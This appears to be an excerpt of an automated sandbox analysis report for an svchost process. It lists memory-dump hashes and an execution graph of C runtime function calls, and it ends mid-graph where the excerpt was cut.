                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 2ecae6e72a3940d52928c0c041aeb9bf1157c791b1ed544ebd6cb20eb84140b6
                                                                                                                                                                                      • Instruction ID: 76046141a513f5bca41d436f854f33cba87dd18f3105753da97d98a96efbea97
                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ecae6e72a3940d52928c0c041aeb9bf1157c791b1ed544ebd6cb20eb84140b6
                                                                                                                                                                                      • Instruction Fuzzy Hash: C001F7A6B1C9460BD30CED7C89271F576D9D755710B2543BDDC4BC73D2EC04980202C6
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 85cae43c6a35d9975031b191bcaef4b8177e71d7d7ddbdc9c7c16db88d458824
                                                                                                                                                                                      • Instruction ID: 12d37009457caee3c4b9272d73d463fe094ffcc23743eba38b9f0b6fd6e783b1
                                                                                                                                                                                      • Opcode Fuzzy Hash: 85cae43c6a35d9975031b191bcaef4b8177e71d7d7ddbdc9c7c16db88d458824
                                                                                                                                                                                      • Instruction Fuzzy Hash: 61F0C87151CE894FD7A6EB3CD89056177F5EF6531031A02EAC08AC76A6DE29E8468740
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 3485069817e8d772b0541969b6f3e10543c4432b15c1102ab55b6769e09daa4d
                                                                                                                                                                                      • Instruction ID: c321e6b3e9044a33af8974e6ffe92dc0d9ed1f9f6d855d2d3bbcbf176f22d471
                                                                                                                                                                                      • Opcode Fuzzy Hash: 3485069817e8d772b0541969b6f3e10543c4432b15c1102ab55b6769e09daa4d
                                                                                                                                                                                      • Instruction Fuzzy Hash: 6B01F47570C8064BD71CBD7C96671B9319AD785310721827EE95BC73E6EC18D81202C5
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 7cf2dc3546bb28d105dd93bbc243cf715e7289dff50a9006b1695dcc789fd062
                                                                                                                                                                                      • Instruction ID: 8fd5647f1a0daf94396011f9beaf8f3834a183b0fc1df416accb87df6ddbb558
                                                                                                                                                                                      • Opcode Fuzzy Hash: 7cf2dc3546bb28d105dd93bbc243cf715e7289dff50a9006b1695dcc789fd062
                                                                                                                                                                                      • Instruction Fuzzy Hash: 54E09AA180F6810FC306AA3589A4410BF64AF9220179944EFC4888B2EAE52E684ACB12
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1826904128.00007FFB4B070000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B070000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4b070000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 82302de2b9b26a5cd3194be66a82dca7dadb84f8076611ff51f9c29e863e9fff
                                                                                                                                                                                      • Instruction ID: 13bf817a4a0c20c308244086ede309b0bab9bb692252f5ab6cf5cdfd8d0c6494
                                                                                                                                                                                      • Opcode Fuzzy Hash: 82302de2b9b26a5cd3194be66a82dca7dadb84f8076611ff51f9c29e863e9fff
                                                                                                                                                                                      • Instruction Fuzzy Hash: 8DE01230A15628CEDF60EB18CC81BEAB3B5FF98300F0041E6D44EE3241CA306A85CF82
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: 343fa0a8336b86a950a0ebd3724f601de28942a9c8cb757c3b7a73f7a56af619
                                                                                                                                                                                      • Instruction ID: d52027179e438336ecbcd93d8721d9ca587ae059d9592e0af7354aad083342b7
                                                                                                                                                                                      • Opcode Fuzzy Hash: 343fa0a8336b86a950a0ebd3724f601de28942a9c8cb757c3b7a73f7a56af619
                                                                                                                                                                                      • Instruction Fuzzy Hash: 06C0123055660D8BC7597B34C5514547165AF49204BD005BCD40DC92D2DE3F9882C700
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID:
                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                      • Opcode ID: f887ffeff5e2ae087036ebe84fce8eae069254c03c59d77103e6334281badad1
                                                                                                                                                                                      • Instruction ID: ed351e6064d25b03f6b77ff42e7e3effae5458612a7facc0ae195f9088b9b30d
                                                                                                                                                                                      • Opcode Fuzzy Hash: f887ffeff5e2ae087036ebe84fce8eae069254c03c59d77103e6334281badad1
                                                                                                                                                                                      • Instruction Fuzzy Hash: 15D0A7A081E2410BD71A7E3081B80253AA86F41312BA414FFE8488E2DAD62E90494309
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Strings
                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                      • Source File: 00000010.00000002.1824674140.00007FFB4AF96000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4AF96000, based on PE: false
                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                      • Snapshot File: hcaresult_16_2_7ffb4af96000_svchost.jbxd
                                                                                                                                                                                      Similarity
                                                                                                                                                                                      • API ID:
                                                                                                                                                                                      • String ID: L_^$L_^$L_^$L_^
                                                                                                                                                                                      • API String ID: 0-2357752022
                                                                                                                                                                                      • Opcode ID: 5e13fce87837abaf485b3b9acff2dd10d68ea3fbea396d53e1a7d6f6a8f1a00b
                                                                                                                                                                                      • Instruction ID: c57e47971eaf1b93a12e87c6f595accc6e88913025d2d2402b634e2c6135982e
                                                                                                                                                                                      • Opcode Fuzzy Hash: 5e13fce87837abaf485b3b9acff2dd10d68ea3fbea396d53e1a7d6f6a8f1a00b
                                                                                                                                                                                      • Instruction Fuzzy Hash: E221C8F391828947D7066F6EDCE61E937E4EF1121CB5851F1CAA88B243FE34644E458A
                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                      Execution Coverage:3.6%
                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                      Signature Coverage:2.8%
                                                                                                                                                                                      Total number of Nodes:1592
                                                                                                                                                                                      Total number of Limit Nodes:9
                                                                                                                                                                                      execution_graph 6712 10008640 6715 10008657 6712->6715 6716 10008665 6715->6716 6717 10008679 6715->6717 6718 10006368 __dosmaperr 20 API calls 6716->6718 6719 10008681 6717->6719 6720 10008693 6717->6720 6721 1000866a 6718->6721 6722 10006368 __dosmaperr 20 API calls 6719->6722 6726 10008652 6720->6726 6728 100054a7 6720->6728 6724 100062ac _abort 26 API calls 6721->6724 6725 10008686 6722->6725 6724->6726 6727 100062ac _abort 26 API calls 6725->6727 6727->6726 6729 100054c4 6728->6729 6735 100054ba 6728->6735 6730 10005af6 _abort 38 API calls 6729->6730 6729->6735 6731 100054e5 6730->6731 6736 10007a00 6731->6736 6735->6726 6737 10007a13 6736->6737 6738 100054fe 6736->6738 6737->6738 6744 10007f0f 6737->6744 6740 10007a2d 6738->6740 6741 10007a40 6740->6741 6742 10007a55 6740->6742 6741->6742 6765 10006d7e 6741->6765 6742->6735 6745 10007f1b ___scrt_is_nonwritable_in_current_image 6744->6745 6746 10005af6 _abort 38 API calls 6745->6746 6747 10007f24 6746->6747 6748 10007f72 _abort 6747->6748 6756 10005671 RtlEnterCriticalSection 6747->6756 6748->6738 6750 10007f42 6757 10007f86 6750->6757 6755 100055a8 _abort 38 API calls 6755->6748 6756->6750 6758 10007f94 __fassign 6757->6758 6760 10007f56 6757->6760 6759 10007cc2 __fassign 20 API calls 6758->6759 6758->6760 6759->6760 6761 10007f75 6760->6761 6764 100056b9 RtlLeaveCriticalSection 6761->6764 6763 10007f69 6763->6748 6763->6755 6764->6763 6766 10006d8a ___scrt_is_nonwritable_in_current_image 6765->6766 6767 10005af6 _abort 38 API calls 6766->6767 6768 10006d94 6767->6768 6771 100055a8 _abort 38 API calls 6768->6771 6772 10006e18 _abort 6768->6772 6773 1000571e _free 20 API calls 6768->6773 6774 10005671 RtlEnterCriticalSection 6768->6774 6775 10006e0f 6768->6775 6771->6768 6772->6742 6773->6768 6774->6768 6778 100056b9 RtlLeaveCriticalSection 6775->6778 6777 10006e16 6777->6768 6778->6777 7345 10007a80 7346 10007a8d 7345->7346 7347 1000637b _abort 20 API calls 7346->7347 7348 10007aa7 7347->7348 7349 1000571e _free 20 API calls 7348->7349 7350 10007ab3 7349->7350 7351 10007ad9 7350->7351 7352 1000637b _abort 20 API calls 7350->7352 7354 10005eb7 11 API calls 7351->7354 7356 10007ae5 7351->7356 7353 10007acd 7352->7353 7355 1000571e _free 20 API calls 7353->7355 7354->7351 7355->7351 6433 10007103 GetCommandLineA GetCommandLineW 6434 10005303 6437 100050a5 6434->6437 6446 1000502f 6437->6446 6440 1000502f 5 API calls 6441 100050c3 6440->6441 6450 10005000 6441->6450 6444 10005000 20 API calls 6445 100050d9 6444->6445 6447 10005048 6446->6447 6448 10002ada _ValidateLocalCookies 5 API calls 6447->6448 6449 10005069 6448->6449 6449->6440 6451 1000502a 6450->6451 6452 1000500d 6450->6452 6451->6444 6453 10005024 6452->6453 6454 1000571e _free 20 API calls 6452->6454 6455 1000571e _free 20 API calls 6453->6455 6454->6452 6455->6451 6779 1000af43 6780 1000af59 6779->6780 6781 1000af4d 6779->6781 6781->6780 6782 1000af52 CloseHandle 6781->6782 6782->6780 6783 1000a945 6784 1000a96d 6783->6784 6785 1000a9a5 6784->6785 6786 1000a997 6784->6786 6787 1000a99e 6784->6787 6792 1000aa17 6786->6792 6796 1000aa00 6787->6796 6793 1000aa20 6792->6793 6800 1000b19b 6793->6800 6797 1000aa20 6796->6797 6798 1000b19b __startOneArgErrorHandling 21 API calls 6797->6798 6799 1000a9a3 6798->6799 6801 1000b1da __startOneArgErrorHandling 6800->6801 6806 1000b25c __startOneArgErrorHandling 6801->6806 6810 1000b59e 6801->6810 6803 1000b286 6805 1000b292 6803->6805 6817 1000b8b2 6803->6817 6808 10002ada _ValidateLocalCookies 5 API calls 6805->6808 6806->6803 6813 100078a3 6806->6813 6809 1000a99c 6808->6809 6824 1000b5c1 6810->6824 6814 100078cb 6813->6814 6815 10002ada _ValidateLocalCookies 5 API calls 6814->6815 6816 100078e8 6815->6816 6816->6803 6818 1000b8d4 6817->6818 6819 1000b8bf 6817->6819 6821 10006368 __dosmaperr 20 API calls 6818->6821 6820 1000b8d9 6819->6820 6822 10006368 __dosmaperr 20 API calls 6819->6822 6820->6805 6821->6820 6823 1000b8cc 6822->6823 6823->6805 6825 1000b5ec __raise_exc 6824->6825 6826 1000b7e5 RaiseException 6825->6826 6827 1000b5bc 6826->6827 6827->6806 7608 1000a1c6 IsProcessorFeaturePresent 7609 10007bc7 7610 10007bd3 ___scrt_is_nonwritable_in_current_image 7609->7610 7611 10007c0a _abort 7610->7611 7617 10005671 RtlEnterCriticalSection 7610->7617 7613 10007be7 7614 10007f86 __fassign 20 API calls 7613->7614 7615 10007bf7 7614->7615 7618 10007c10 7615->7618 7617->7613 7621 100056b9 RtlLeaveCriticalSection 7618->7621 7620 10007c17 7620->7611 7621->7620 6828 10005348 6829 10003529 ___vcrt_uninitialize 8 API calls 6828->6829 6830 1000534f 6829->6830 6831 10007b48 6841 10008ebf 6831->6841 6835 10007b55 6854 1000907c 6835->6854 6838 10007b7f 6839 1000571e _free 20 API calls 6838->6839 6840 10007b8a 6839->6840 6858 10008ec8 6841->6858 6843 10007b50 6844 10008fdc 6843->6844 6845 10008fe8 ___scrt_is_nonwritable_in_current_image 6844->6845 6878 10005671 RtlEnterCriticalSection 6845->6878 6847 1000905e 6892 10009073 6847->6892 6849 10008ff3 6849->6847 6850 10009032 RtlDeleteCriticalSection 6849->6850 6879 1000a09c 6849->6879 6853 1000571e _free 20 API calls 6850->6853 6851 1000906a _abort 6851->6835 6853->6849 6855 10009092 6854->6855 6856 10007b64 RtlDeleteCriticalSection 6854->6856 6855->6856 6857 1000571e _free 20 API calls 6855->6857 6856->6835 6856->6838 6857->6856 6859 10008ed4 ___scrt_is_nonwritable_in_current_image 6858->6859 6868 10005671 RtlEnterCriticalSection 6859->6868 6861 10008f77 6873 10008f97 6861->6873 6864 10008f83 _abort 6864->6843 6866 10008e78 66 API calls 6867 10008ee3 6866->6867 6867->6861 6867->6866 6869 10007b94 RtlEnterCriticalSection 6867->6869 6870 10008f6d 6867->6870 6868->6867 6869->6867 6876 10007ba8 RtlLeaveCriticalSection 6870->6876 6872 10008f75 6872->6867 6877 100056b9 RtlLeaveCriticalSection 6873->6877 6875 10008f9e 6875->6864 6876->6872 6877->6875 6878->6849 6880 1000a0a8 ___scrt_is_nonwritable_in_current_image 6879->6880 6881 1000a0b9 6880->6881 6882 1000a0ce 6880->6882 6883 10006368 __dosmaperr 20 API calls 6881->6883 6891 1000a0c9 _abort 6882->6891 6895 10007b94 RtlEnterCriticalSection 6882->6895 6885 1000a0be 6883->6885 6887 100062ac _abort 26 API calls 6885->6887 6886 1000a0ea 6896 1000a026 6886->6896 6887->6891 6889 1000a0f5 6912 1000a112 6889->6912 6891->6849 7160 100056b9 RtlLeaveCriticalSection 6892->7160 6894 1000907a 6894->6851 6895->6886 6897 1000a033 6896->6897 6898 1000a048 6896->6898 6899 10006368 __dosmaperr 20 API calls 6897->6899 6904 1000a043 6898->6904 6915 10008e12 6898->6915 6900 1000a038 6899->6900 6902 100062ac _abort 26 API calls 6900->6902 6902->6904 6904->6889 6905 1000907c 20 API calls 6906 1000a064 6905->6906 6921 10007a5a 6906->6921 6908 1000a06a 6928 1000adce 6908->6928 6911 1000571e _free 20 API calls 6911->6904 7159 10007ba8 RtlLeaveCriticalSection 6912->7159 6914 1000a11a 6914->6891 6916 10008e2a 6915->6916 6917 10008e26 6915->6917 6916->6917 6918 10007a5a 26 API calls 6916->6918 6917->6905 6919 10008e4a 6918->6919 6943 10009a22 6919->6943 6922 10007a66 6921->6922 6923 10007a7b 6921->6923 6924 10006368 __dosmaperr 20 API calls 6922->6924 6923->6908 6925 10007a6b 6924->6925 6926 100062ac _abort 26 API calls 6925->6926 6927 10007a76 6926->6927 6927->6908 6929 1000adf2 6928->6929 6930 1000addd 6928->6930 6932 1000ae2d 6929->6932 6936 1000ae19 6929->6936 6931 10006355 __dosmaperr 20 API calls 6930->6931 6933 1000ade2 6931->6933 6934 10006355 __dosmaperr 20 API calls 6932->6934 6935 10006368 __dosmaperr 20 API calls 6933->6935 6937 1000ae32 6934->6937 6941 1000a070 6935->6941 7116 1000ada6 6936->7116 6939 10006368 __dosmaperr 20 API calls 6937->6939 6940 1000ae3a 6939->6940 6942 100062ac _abort 26 API calls 6940->6942 6941->6904 6941->6911 6942->6941 6944 10009a2e ___scrt_is_nonwritable_in_current_image 6943->6944 6945 10009a36 6944->6945 6946 10009a4e 6944->6946 6968 10006355 6945->6968 6948 10009aec 6946->6948 6951 10009a83 6946->6951 6950 10006355 __dosmaperr 20 API calls 6948->6950 6952 10009af1 6950->6952 6971 10008c7b RtlEnterCriticalSection 6951->6971 6955 10006368 __dosmaperr 20 API calls 6952->6955 6953 10006368 __dosmaperr 20 API calls 6961 10009a43 _abort 6953->6961 6957 10009af9 6955->6957 6956 10009a89 6958 10009aa5 6956->6958 6959 10009aba 6956->6959 6960 100062ac _abort 26 API calls 6957->6960 6962 10006368 __dosmaperr 20 API calls 6958->6962 6972 10009b0d 6959->6972 6960->6961 6961->6917 6964 10009aaa 6962->6964 6966 10006355 __dosmaperr 20 API calls 6964->6966 6965 10009ab5 7023 10009ae4 6965->7023 6966->6965 6969 10005b7a _abort 20 API calls 6968->6969 6970 1000635a 6969->6970 6970->6953 6971->6956 6973 10009b3b 6972->6973 7010 10009b34 6972->7010 6974 10009b5e 6973->6974 6975 10009b3f 6973->6975 6979 10009baf 6974->6979 6980 10009b92 6974->6980 6976 10006355 __dosmaperr 20 API calls 6975->6976 6978 10009b44 6976->6978 6977 10002ada _ValidateLocalCookies 5 API calls 6981 10009d15 6977->6981 6982 10006368 __dosmaperr 20 API calls 6978->6982 6989 10009bc5 6979->6989 7026 1000a00b 6979->7026 6983 10006355 __dosmaperr 20 API calls 6980->6983 6981->6965 6984 10009b4b 6982->6984 6987 10009b97 6983->6987 6988 100062ac _abort 26 API calls 6984->6988 6991 10006368 __dosmaperr 20 API calls 6987->6991 6988->7010 7029 100096b2 6989->7029 6994 10009b9f 6991->6994 6992 10009bd3 6998 10009bd7 6992->6998 6999 10009bf9 6992->6999 6993 10009c0c 6996 10009c20 6993->6996 6997 10009c66 WriteFile 6993->6997 6995 100062ac _abort 26 API calls 6994->6995 6995->7010 7002 10009c56 6996->7002 7003 10009c28 6996->7003 7000 10009c89 GetLastError 6997->7000 7005 10009bef 6997->7005 7004 10009ccd 6998->7004 7036 10009645 6998->7036 7041 10009492 GetConsoleCP 6999->7041 7000->7005 7067 10009728 7002->7067 7006 10009c46 7003->7006 7007 10009c2d 7003->7007 7004->7010 7011 10006368 __dosmaperr 20 API calls 7004->7011 7005->7004 7005->7010 7014 10009ca9 7005->7014 7059 100098f5 7006->7059 7007->7004 7052 10009807 7007->7052 7010->6977 7013 10009cf2 7011->7013 7016 10006355 __dosmaperr 20 API calls 7013->7016 7017 10009cb0 7014->7017 7018 10009cc4 7014->7018 7016->7010 7019 10006368 __dosmaperr 20 API calls 7017->7019 7074 10006332 7018->7074 7021 10009cb5 7019->7021 7022 10006355 __dosmaperr 20 API calls 7021->7022 7022->7010 7115 10008c9e RtlLeaveCriticalSection 7023->7115 7025 10009aea 7025->6961 7079 10009f8d 7026->7079 7101 10008dbc 7029->7101 7031 100096c2 7032 100096c7 7031->7032 7033 10005af6 _abort 38 API calls 7031->7033 7032->6992 7032->6993 7034 100096ea 7033->7034 7034->7032 7035 10009708 GetConsoleMode 7034->7035 7035->7032 7037 1000969f 7036->7037 7040 1000966a 7036->7040 7037->7005 7038 1000a181 WriteConsoleW CreateFileW 7038->7040 7039 100096a1 GetLastError 7039->7037 7040->7037 7040->7038 7040->7039 7049 100094f5 7041->7049 7051 10009607 7041->7051 7042 10002ada _ValidateLocalCookies 5 API calls 7043 10009641 7042->7043 7043->7005 7045 100079e6 40 API calls __fassign 7045->7049 7046 1000957b WideCharToMultiByte 7047 100095a1 WriteFile 7046->7047 7046->7051 7048 1000962a GetLastError 7047->7048 7047->7049 7048->7051 7049->7045 7049->7046 7050 100095d2 WriteFile 7049->7050 7049->7051 7110 10007c19 7049->7110 7050->7048 7050->7049 7051->7042 7054 10009816 7052->7054 7053 100098d8 7056 10002ada _ValidateLocalCookies 5 API calls 7053->7056 7054->7053 7055 10009894 WriteFile 7054->7055 7055->7054 7057 100098da GetLastError 7055->7057 7058 100098f1 7056->7058 7057->7053 7058->7005 7064 10009904 7059->7064 7060 10009a0f 7061 10002ada _ValidateLocalCookies 5 API calls 7060->7061 7063 10009a1e 7061->7063 7062 10009986 WideCharToMultiByte 7065 10009a07 GetLastError 7062->7065 7066 100099bb WriteFile 7062->7066 7063->7005 7064->7060 7064->7062 7064->7066 7065->7060 7066->7064 7066->7065 7069 10009737 7067->7069 7068 100097ea 7071 10002ada _ValidateLocalCookies 5 API calls 7068->7071 7069->7068 7070 100097a9 WriteFile 7069->7070 7070->7069 7072 100097ec GetLastError 7070->7072 7073 10009803 7071->7073 7072->7068 7073->7005 7075 10006355 __dosmaperr 20 API calls 7074->7075 7076 1000633d __dosmaperr 7075->7076 7077 10006368 __dosmaperr 20 API calls 7076->7077 7078 10006350 7077->7078 7078->7010 7088 10008d52 7079->7088 7081 10009f9f 7082 10009fa7 7081->7082 7083 10009fb8 SetFilePointerEx 7081->7083 7084 10006368 __dosmaperr 20 API calls 7082->7084 7085 10009fd0 GetLastError 7083->7085 7086 10009fac 7083->7086 7084->7086 7087 10006332 __dosmaperr 20 API calls 7085->7087 7086->6989 7087->7086 7089 10008d74 7088->7089 7090 10008d5f 7088->7090 7093 10006355 __dosmaperr 20 API calls 7089->7093 7095 10008d99 7089->7095 7091 10006355 __dosmaperr 20 API calls 7090->7091 7092 10008d64 7091->7092 7094 10006368 __dosmaperr 20 API calls 7092->7094 7096 10008da4 7093->7096 7097 10008d6c 7094->7097 7095->7081 7098 10006368 __dosmaperr 20 API calls 7096->7098 7097->7081 7099 10008dac 7098->7099 7100 100062ac _abort 26 API calls 7099->7100 7100->7097 7102 10008dd6 7101->7102 7103 10008dc9 7101->7103 7105 10008de2 7102->7105 7106 10006368 __dosmaperr 20 API calls 7102->7106 7104 10006368 __dosmaperr 20 API calls 7103->7104 7107 10008dce 7104->7107 7105->7031 7108 10008e03 7106->7108 7107->7031 7109 100062ac _abort 26 API calls 7108->7109 7109->7107 7111 10005af6 _abort 38 API calls 7110->7111 7112 10007c24 7111->7112 7113 10007a00 __fassign 38 API calls 7112->7113 7114 10007c34 7113->7114 7114->7049 7115->7025 7119 1000ad24 7116->7119 7118 1000adca 7118->6941 7120 1000ad30 ___scrt_is_nonwritable_in_current_image 7119->7120 7130 10008c7b RtlEnterCriticalSection 7120->7130 7122 1000ad3e 7123 1000ad70 7122->7123 7124 1000ad65 7122->7124 7126 10006368 __dosmaperr 20 API calls 7123->7126 7131 1000ae4d 7124->7131 7127 1000ad6b 7126->7127 7146 1000ad9a 7127->7146 7129 1000ad8d _abort 7129->7118 7130->7122 7132 10008d52 26 API calls 7131->7132 7135 1000ae5d 7132->7135 7133 1000ae63 7149 10008cc1 7133->7149 7134 1000ae95 7134->7133 7138 10008d52 26 API calls 7134->7138 7135->7133 7135->7134 7137 10008d52 26 API calls 7135->7137 7140 1000ae8c 7137->7140 7141 1000aea1 CloseHandle 7138->7141 7143 10008d52 26 API calls 7140->7143 7141->7133 7144 1000aead GetLastError 7141->7144 7142 1000aedd 7142->7127 7143->7134 7144->7133 7145 10006332 __dosmaperr 20 API calls 7145->7142 7158 10008c9e RtlLeaveCriticalSection 7146->7158 7148 1000ada4 7148->7129 7150 10008cd0 7149->7150 7151 10008d37 7149->7151 7150->7151 7156 10008cfa 7150->7156 7152 10006368 __dosmaperr 20 API calls 7151->7152 7153 10008d3c 7152->7153 7154 10006355 __dosmaperr 20 API calls 7153->7154 7155 10008d27 7154->7155 7155->7142 7155->7145 7156->7155 7157 10008d21 SetStdHandle 7156->7157 7157->7155 7158->7148 7159->6914 7160->6894 7161 10002049 7162 10002055 ___scrt_is_nonwritable_in_current_image 7161->7162 7163 100020d3 7162->7163 7164 1000207d 7162->7164 7174 1000205e 7162->7174 7165 10002639 ___scrt_fastfail 4 API calls 7163->7165 7175 1000244c 7164->7175 7167 100020da 7165->7167 7168 10002082 7184 10002308 7168->7184 7170 10002087 __RTC_Initialize 7187 100020c4 7170->7187 7172 1000209f 7190 1000260b 7172->7190 7176 10002451 ___scrt_release_startup_lock 7175->7176 7177 10002461 7176->7177 7178 10002455 7176->7178 7181 1000246e 7177->7181 7182 1000499b _abort 28 API calls 7177->7182 7179 1000527a _abort 20 API calls 7178->7179 7180 1000245f 7179->7180 7180->7168 7181->7168 7183 10004bbd 7182->7183 7183->7168 7196 100034c7 RtlInterlockedFlushSList 7184->7196 7186 10002312 7186->7170 7198 1000246f 7187->7198 7189 100020c9 ___scrt_release_startup_lock 7189->7172 7191 10002617 7190->7191 7195 1000262d 7191->7195 7217 100053ed 7191->7217 7194 10003529 ___vcrt_uninitialize 8 API calls 7194->7195 7195->7174 7197 100034d7 7196->7197 7197->7186 7203 100053ff 7198->7203 7201 1000391b ___vcrt_uninitialize_ptd 6 API calls 7202 1000354d 7201->7202 7202->7189 7206 10005c2b 7203->7206 7207 10005c35 7206->7207 7209 10002476 7206->7209 7210 10005db2 7207->7210 7209->7201 7211 10005c45 _abort 5 API calls 7210->7211 7212 10005dd9 7211->7212 7213 10005df1 TlsFree 7212->7213 7214 10005de5 7212->7214 7213->7214 7215 10002ada _ValidateLocalCookies 5 API calls 7214->7215 7216 10005e02 7215->7216 7216->7209 7220 100074da 7217->7220 7223 100074f3 7220->7223 7221 10002ada _ValidateLocalCookies 5 API calls 7222 10002625 7221->7222 7222->7194 7223->7221 7357 10008a89 7360 10006d60 7357->7360 7361 10006d69 7360->7361 7362 10006d72 7360->7362 7364 10006c5f 7361->7364 7365 10005af6 _abort 38 API calls 7364->7365 7366 10006c6c 7365->7366 7367 10006d7e __fassign 38 API calls 7366->7367 7368 10006c74 7367->7368 7384 100069f3 7368->7384 7371 10006c8b 7371->7362 7374 10006cce 7377 1000571e _free 20 API calls 7374->7377 7377->7371 7378 10006cc9 7379 10006368 __dosmaperr 20 API calls 7378->7379 7379->7374 7380 10006d12 7380->7374 7408 100068c9 7380->7408 7381 10006ce6 7381->7380 7382 1000571e _free 20 API calls 7381->7382 7382->7380 7385 100054a7 __fassign 38 API calls 7384->7385 7386 10006a05 7385->7386 7387 10006a14 GetOEMCP 7386->7387 7388 10006a26 7386->7388 7390 10006a3d 7387->7390 7389 10006a2b GetACP 7388->7389 7388->7390 7389->7390 7390->7371 7391 100056d0 7390->7391 7392 1000570e 7391->7392 7396 100056de _abort 7391->7396 7394 10006368 __dosmaperr 20 API calls 7392->7394 7393 100056f9 RtlAllocateHeap 7395 1000570c 7393->7395 7393->7396 7394->7395 7395->7374 7398 10006e20 7395->7398 7396->7392 7396->7393 7397 1000474f _abort 7 API calls 7396->7397 7397->7396 7399 100069f3 40 API calls 7398->7399 7400 10006e3f 7399->7400 7403 10006e90 IsValidCodePage 7400->7403 7405 10006e46 7400->7405 7407 10006eb5 ___scrt_fastfail 7400->7407 7401 10002ada _ValidateLocalCookies 5 API calls 7402 10006cc1 7401->7402 7402->7378 7402->7381 7404 10006ea2 GetCPInfo 7403->7404 7403->7405 7404->7405 7404->7407 7405->7401 7411 10006acb GetCPInfo 7407->7411 7484 10006886 7408->7484 7410 100068ed 7410->7374 7416 10006b05 7411->7416 7420 10006baf 7411->7420 7413 10002ada _ValidateLocalCookies 5 API calls 7415 10006c5b 7413->7415 7415->7405 7421 100086e4 7416->7421 7419 10008a3e 43 API calls 7419->7420 7420->7413 7422 100054a7 __fassign 38 API calls 7421->7422 7423 10008704 MultiByteToWideChar 7422->7423 7425 10008742 7423->7425 7433 100087da 7423->7433 7427 100056d0 21 API calls 7425->7427 7430 10008763 ___scrt_fastfail 7425->7430 7426 10002ada _ValidateLocalCookies 5 API calls 7428 10006b66 7426->7428 7427->7430 7435 10008a3e 7428->7435 7429 100087d4 7440 10008801 7429->7440 7430->7429 7432 100087a8 MultiByteToWideChar 7430->7432 7432->7429 7434 